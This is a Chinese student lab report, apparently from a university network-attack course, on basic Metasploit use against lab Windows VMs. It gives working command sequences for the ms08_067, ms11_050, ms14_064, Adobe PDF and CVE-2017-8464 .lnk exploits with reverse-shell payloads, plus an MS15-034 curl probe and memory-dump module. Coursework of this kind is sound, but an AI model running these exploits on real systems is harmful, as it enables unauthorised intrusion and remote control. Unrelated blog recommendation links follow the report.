2018-2019-2 网络对抗技术 20165236 Exp5 MSF基础应用

一、 实践内容(3.5分)

本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路。具体需要完成:

1.1一个主动攻击实践,如ms08_067; (1分)

1.2 一个针对浏览器的攻击,如ms11_050;(1分)

1.3 一个针对客户端的攻击,如Adobe;(1分)

1.4 成功应用任何一个辅助模块。(0.5分)

任务一 主动攻击实践,ms08_067

靶机:Windows XP

主机:  Kali

1、输入msfconsole指令,进入控制台,却遇到以下问题,原因是没有连接数据库:

2、输入service postgresql start启动数据库,再次进入控制台,输入search ms08-067查看ms08_067这个漏洞在哪里:

3、选择漏洞use exploit/windows/smb/ms08_067_netapi;

输入show payloads,查看可以供我们使用的payload:

4、选择通过反向连接来获取shell的generic/shell_reverse_tcp当payload,输入指令set payload generic/shell_reverse_tcp

对payload进行设置;

5、输入show options查看我们需要设置的参数,发现需要设置一个RHOST和一个LHOST:

6、修改target的值为0,选择我们想要攻击的计算机系统:

7、输入exploit进行攻击,攻击成功:

任务二:一个针对浏览器的攻击

1、实现ms11_050的攻击

靶机:Windows XP SP3

主机:  Kali

实验步骤:

搜索漏洞search ms11_050;
使用漏洞use exploit/windows/browser/ms11_050_mshtml_cobjectelement;
设置靶机类型set target 3;
选择攻击载荷set payload generic/shell_reverse_tcp;
使用命令set SRVHOST 192.168.1.238设置地址;
配置好地址后显示配置信息show options;

结果攻击成功:

2、实现ms14_064的攻击

靶机:Windows XP SP3 English IE8

主机:Kali

实验步骤:

搜索漏洞,然后使用漏洞,使用show payloads查看适用攻击载荷;
选择攻击载荷set payload generic/shell_reverse_tcp;
查看配置信息show options;
而后通过查看配置信息添加所需选项;
设置监听地址、监听端口和url域名;
输入exploit 开始攻击,并在靶机打开IE浏览器输入生成的网址,kali的8080端口监听获得连接,建立会话;
查看开启的会话;

攻击成功截图:

任务三:一个针对客户端的攻击

一、实现对Adobe的攻击

靶机:Windows XP sp3(English)

1、选择攻击模块,将其载入,选用exploit/windows/fileformat/adobe_toolbutton,如图:

2、输入命令show payloads选择要使用的payload;

3、输入命令show options查看相关参数设置要求:

4、开始实施攻击,发现在/root/.msf4/local/目录下成功生成了一个20165236.pdf文件,将该文件传送到靶机上并且在攻击机上打开监听

5、将靶机中的pdf文件打开,攻击机成功获取到靶机shell:

二、实现对CVE-2017-8464的攻击

靶机是Win7

实验步骤:

1、使用命令:search CVE:2018 type:exploit查看CVE-2017和2018漏洞有哪些:

2、使用指令:

msfconsole
use exploit/windows/fileformat/cve_2017_8464_lnk_rce
set payload windows/meterpreter/reverse_tcp
show options
set LHOST 192.168.19.129
exploit

3、将生成的.lnk文件复制到U盘里面,然后在msf中开始监听;

4、将U盘插入靶机中,如图,攻击成功:

任务四:实现对应用辅助模块的攻击

靶机:windows server 2012 R2

IP:192.168.19.148

实验步骤:

1、使用search use auxiliary/server扫描靶机开发端口:

2、win2012安装iis服务后访问80端口,检测是否存在漏洞:使用curl发送以下数据:

curl http://192.168.19.148 -H "Host: 192.168.19.148" -H "Range: bytes=0-18446744073709551615",

当出现Requested Range Not Satisfiable时说明存在漏洞;

3、依次输入以下指令进行攻击:

use auxiliary/scanner/http/ms15_034_http_sys_memory_dump
show options
set rhosts 192.168.19.148
set threads 10
exploit

4、如图所示,对靶机windows server 2012攻击成功:

二、实验过程遇到的问题

1、在一个主动攻击实践实验过程中,进入控制台时,遇到如下问题:

原因是没有连接到数据库;

解决方法:使用命令service postgresql start启动数据库,即可进入控制台:

三、基础问题回答

1、用自己的话解释什么是exploit,payload,encode?

答:exploit:英文翻译为利用,黑客就是利用漏洞对电脑进行攻击,有漏洞不一定可以利用,但可以利用的一定有漏洞;

payload:有效载荷。在传输数据时,为了使数据传输更可靠,要把原始数据分批传输,并且在每一批数据的头和尾都加上一定的辅助信息,而其中的原始数据就是payload;
encode:编码器,用来给payload进行编码,保护payload不被发现。

四、实验体会

本次实验目的是掌握metasploit的基本应用方式,重点常用的三种攻击方式。可以说是对之前所学知识的总结,我最大的感悟就是

虽然其中每次攻击不一定都能成功,但msf确实非常的强大,为此一定要及时更新系统,填补漏洞以防被攻击。实验过程中我也遇到了许多问题,

在查阅资料以及老师同学的帮助下一个个解决了,并顺利完成了实验。

 

2018-2019-2 网络对抗技术 20165236 Exp5 MSF基础应用的更多相关文章

  1. 2018-2019-2 网络对抗技术 20165318 Exp5 MSF基础应用

    2018-2019-2 网络对抗技术 20165318 Exp5 MSF基础应用 原理与实践说明 实践原理 实践内容概述 基础问题回答 攻击实例 主动攻击的实践 ms08_067_netapi:自动化 ...

  2. 2018-2019-2 网络对抗技术 20165301 Exp5 MSF基础应用

    2018-2019-2 网络对抗技术 20165301 Exp5 MSF基础应用 实践原理 1.MSF攻击方法 主动攻击:扫描主机漏洞,进行攻击 攻击浏览器 攻击其他客户端 2.MSF的六个模块 查看 ...

  3. 2018-2019-2 20165311《网络对抗技术》Exp5 MSF基础应用

    <网络对抗技术>Exp5 MSF基础应用 实验目的 实验内容 一个主动攻击实践(ms08_067) 一个针对浏览器的攻击(ms11_050) 一个针对客户端的攻击(adobe_toolbu ...

  4. 2018-2019-2 网络对抗技术 20165317 Exp5 MSF基础应用

    2018-2019-2 网络对抗技术 20165317 Exp5 MSF基础应用 一.原理与实践说明 1.实践内容 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具 ...

  5. 2018-2019-2 网络对抗技术 20165225 Exp5 MSF基础应用

    2018-2019-2 网络对抗技术 20165225 Exp5 MSF基础应用 验前准备 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 一个主动攻 ...

  6. 2018-2019-2 网络对抗技术 20165316 Exp5 MSF基础应用

    2018-2019-2 网络对抗技术 20165316 Exp5 MSF基础应用 目录 原理与实践说明 实践原理 实践内容概述 基础问题回答 攻击实例 主动攻击的实践 ms08_067_netapi: ...

  7. 20165214 2018-2019-2 《网络对抗技术》Exp5 MSF基础应用 Week8

    <网络对抗技术>Exp5 MSF基础应用 Week8 一.实验目标与内容 1.实践内容(3.5分) 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体我 ...

  8. 2018-2019-2 网络对抗技术 20165228 Exp5 MSF基础应用

    2018-2019-2 网络对抗技术 20165228 Exp5 MSF基础应用 exploit选取 主动攻击:ms17_010_eternalblue(唯一) 浏览器攻击:ms05_054_onlo ...

  9. 20165308『网络对抗技术』Exp5 MSF基础应用

    20165308『网络对抗技术』Exp5 MSF基础应用 一.原理与实践说明 实践内容 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 一个主动攻击实 ...

随机推荐

  1. Python知识目录

    目录 一.计算机基础 二.Python基础 三.函数 四.常用模块 五.模块和包 六.面向对象 七.网络编程socket 八.数据库 九.前端 十.Python Web框架 十一.版本控制--GIT ...

  2. jsp 部署

    部署一个Servlet 3.0应用程序是一件轻而易举的 事.通过Servlet注解类型,对于不太复杂的应用程序, 可以部署没有描述符的Servlet/JSP应用程序.尽管如 此,在需要更加精细配置的情 ...

  3. java 根据Url下载对应的文件到指定位置,读txt文件获取url

    package test; import java.io.BufferedReader; import java.io.File; import java.io.FileInputStream; im ...

  4. java实现http请求

    String apiUrl = "https://api.seniverse.com/v3/weather/now.json?key=" + key + "&lo ...

  5. HTTP协议是无状态的

    含义: 无状态是指协议对于事务处理没有记忆能力,服务器不知道客户端是什么状态.从另一方面讲,打开一个服务器上的网页和你之前打开这个服务器上的网页之间没有任何联系 实际中的使用情况: 在web应用中,我 ...

  6. FZU 2285 迷宫寻宝

    思路: bfs求最短路径. #include<stdio.h> #include<iostream> #include<queue> #include<cst ...

  7. AGC016D - XOR Replace 置换/轮换

    目录 题目链接 题解 代码 题目链接 AGC016D - XOR Replace 题解 可以发现一次操作相当于一次置换 对于每个a上的位置映射到b对应 可以找到置换群中的 所有轮换 一个k个元素的轮换 ...

  8. 【安全性测试】Android测试中的一点小发现

    在执行某个项目中的APP测试发现的两个问题,自然也是提供参考,作为经验记录下来. 一.通过apk的xml文件获取到某项目APP的账号和密码 使用eclipsel或者drozer,获得apk的xml文件 ...

  9. css 元素溢出

    css元素溢出: 当子元素的尺寸超过父元素的尺寸时,需要设置父元素显示溢出的子元素的方式,设置的方法是通过overflow属性来设置. overflow的设置项: (1)visible 默认值 内容不 ...

  10. 【C语言程序】输出前50个素数

    #include <stdio.h> #include <stdlib.h> int main(void) {  ;  ;  ){   ;   ;i<x;i++){    ...